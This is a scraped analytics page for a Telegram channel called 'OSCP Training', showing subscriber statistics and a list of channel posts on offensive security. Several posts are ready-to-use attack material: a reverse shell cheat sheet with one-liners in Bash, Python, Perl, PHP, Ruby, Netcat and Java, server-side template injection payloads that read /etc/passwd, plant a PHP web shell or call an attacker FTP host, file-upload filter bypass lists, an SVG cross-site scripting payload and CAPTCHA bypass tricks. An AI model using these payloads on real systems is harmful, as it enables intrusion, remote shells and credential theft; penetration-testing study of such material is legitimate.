ch
Feedback
🔥OSCP Training🔥🛡⚔️👨🏻‍💻

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

前往频道在 Telegram

Offensive Security Certified Professional @CEH_training @WebHacking @pfsense @WifiHacking 🔰For safer days

显示更多
未指定国家技术与应用11 688
7 490
订阅者
无数据24 小时
+37 天
-2030 天

数据加载中...

相似频道
无数据
有任何问题?请刷新页面或联系我们的客服
标签云
无数据
有任何问题?请刷新页面或联系我们的客服
进出提及
---
---
---
---
---
---
吸引订阅者
三月 '25
三月 '250
在0个频道中
二月 '25
+56
在0个频道中
Get PRO
一月 '25
+61
在0个频道中
Get PRO
十二月 '24
+62
在0个频道中
Get PRO
十一月 '24
+74
在0个频道中
Get PRO
十月 '24
+90
在0个频道中
Get PRO
九月 '24
+114
在0个频道中
Get PRO
八月 '24
+156
在0个频道中
Get PRO
七月 '24
+185
在0个频道中
Get PRO
六月 '24
+219
在1个频道中
Get PRO
五月 '24
+259
在0个频道中
Get PRO
四月 '24
+193
在1个频道中
Get PRO
三月 '24
+133
在1个频道中
Get PRO
二月 '24
+179
在0个频道中
Get PRO
一月 '24
+189
在3个频道中
Get PRO
十二月 '23
+188
在2个频道中
Get PRO
十一月 '23
+176
在0个频道中
Get PRO
十月 '23
+154
在1个频道中
Get PRO
九月 '23
+204
在0个频道中
Get PRO
八月 '23
+255
在0个频道中
Get PRO
七月 '23
+297
在0个频道中
Get PRO
六月 '23
+239
在0个频道中
Get PRO
五月 '23
+266
在0个频道中
Get PRO
四月 '23
+218
在0个频道中
Get PRO
三月 '23
+244
在0个频道中
Get PRO
二月 '23
+231
在0个频道中
Get PRO
一月 '23
+256
在0个频道中
Get PRO
十二月 '22
+222
在0个频道中
Get PRO
十一月 '22
+247
在0个频道中
Get PRO
十月 '22
+220
在0个频道中
Get PRO
九月 '22
+247
在0个频道中
Get PRO
八月 '22
+199
在0个频道中
Get PRO
七月 '22
+230
在0个频道中
Get PRO
六月 '22
+187
在0个频道中
Get PRO
五月 '22
+139
在0个频道中
Get PRO
四月 '22
+464
在0个频道中
Get PRO
三月 '220
在0个频道中
Get PRO
二月 '220
在0个频道中
Get PRO
一月 '220
在0个频道中
Get PRO
十二月 '21
+107
在0个频道中
Get PRO
十一月 '21
+139
在0个频道中
Get PRO
十月 '21
+231
在0个频道中
Get PRO
九月 '21
+120
在0个频道中
Get PRO
八月 '21
+135
在0个频道中
Get PRO
七月 '21
+143
在0个频道中
Get PRO
六月 '21
+150
在0个频道中
Get PRO
五月 '21
+138
在0个频道中
Get PRO
四月 '21
+163
在0个频道中
Get PRO
三月 '21
+165
在0个频道中
Get PRO
二月 '21
+192
在0个频道中
Get PRO
一月 '21
+247
在0个频道中
Get PRO
十二月 '20
+1 077
在0个频道中
日期
订阅者增长
提及
频道
02 三月0
01 三月0
频道帖子
2
没有文字...
2 574
3
没有文字...
2 924
4
Wireshark.pdf
2 737
5
Web Application Lab Setup Guide .pdf
2 700
6
OSCP Cheat Sheet-2.pdf
3 967
7
RedTeam Scenarios.pdf.pdf
299
8
OSCP Exam Report.pdf
3 954
9
OSCP Notes 2.pdf
4 919
10
没有文字...
4 755
11
File Upload Bypass - Blacklisting Bypass PHP → .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .ph
File Upload Bypass - Blacklisting Bypass PHP → .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module ASP → .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml Jsp → .jsp, .jspx, .jsw, .jsv, .jspf Coldfusion → .cfm, .cfml, .cfc, .dbm Perl → .pl, .cgi Using random capitalization → .pHp, .pHP5, .PhAr Whitelisting Bypass file.png.php file.png.Php5 file.php%20 file.php%0a file.php%00 file.php%0d%0a file.php/ file.php.\ file. file.php.... file.pHp5.... file.png.php file.png.pHp5 file.php#.png file.php%00.png file.php\x00.png file.php%0a.png file.php%0d%0a.png file.phpJunk123png file.png.jpg.php file.php%00.png%00.jpg
3 953
12
@OSCP_training @WebHacking
@OSCP_training @WebHacking
3 335
13
SSTI (Server Side Template Injection) Generic ${{<%[%'"}}%\. {% debug %} {7*7} {{ '7'*7 }} {2*2}[[7*7]] <%= 7 * 7 %>
SSTI (Server Side Template Injection) Generic ${{<%[%'"}}%\. {% debug %} {7*7} {{ '7'*7 }} {2*2}[[7*7]] <%= 7 * 7 %> #{3*3} #{ 3 * 3 } [[3*3]] ${2*2} @(3*3) ${= 3*3} {{= 7*7}} ${{7*7}} #{7*7} [=7*7] {{ request }} {{self}} {{dump(app)}} {{ [] .class.base.subclassesO }} {{''.class.mro()[l] .subclassesO}} for c in [1,2,3] %}{{ c,c,c }}{% endfor %} {{ []._class.base.subclasses_O }} {{['cat%20/etc/passwd']|filter('system')}} PHP {php}print "Hello"{/php} {php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php} {{dump(app)}} {{app.request.server.all|join(',')}} "{{'/etc/passwd'|file_excerpt(1,30)}}"@ {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {$smarty.version} {php}echo id;{/php} {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())} Python {% debug %} {{settings.SECRET_KEY}} {% import foobar %} = Error {% import os %}{{os.system('whoami')}}
3 178
14
Google Dorks to Find Sensitive data or dir
Google Dorks to Find Sensitive data or dir
2 295
15
APIs Fuzzing for Bug Bounty.pdf
2 863
16
CAPTCHA Bypass * Send old captcha value. * Send old captcha value with old session ID. * Remove captcha with any adblocker and request again * Bypass with OCR * Response manipulation. * Use any token with the same length(+1/-1). * Remove the param value or remove the entire parameter. * Change the method from POST to GET(or PUT) and remove the captcha. * Change body to JSON or vice-versa. * Check whether the value of the captcha is in the source code. * Add headers: X-Forwarded-Host: 127.0.0.1 X-Forwarded-For: 127.0.0.1 X-Originating-IP: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1 X-Client-IP: 127.0.0.1 X-Host: 127.0.0.1
3 709
17
Tryhackme.pdf
5 849
18
Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image
Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings. Many file uploads allow SVGs and are prone to tampering. <svg width="600" height="400" xmlns="w3.org/2000/svg" xmlns:xhtml="w3.org/1999/xhtml"> <foreignObject width="100%" height="100%"> <body xmlns="w3.org/1999/xhtml"> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>
4 930
19
WhatsApp'ta OSCP Training kanalını takip edin: https://whatsapp.com/channel/0029VaDxObG17EmxK6bvmy3a
2 745
20
Reverse Shell Cheat Sheet Bash; bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 Python; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' PERL; perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' PHP; php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' Ruby; ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' Netcat; nc -e /bin/sh 10.0.0.1 1234 Java; r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() xterm; xterm -display 10.0.0.1:1
3 037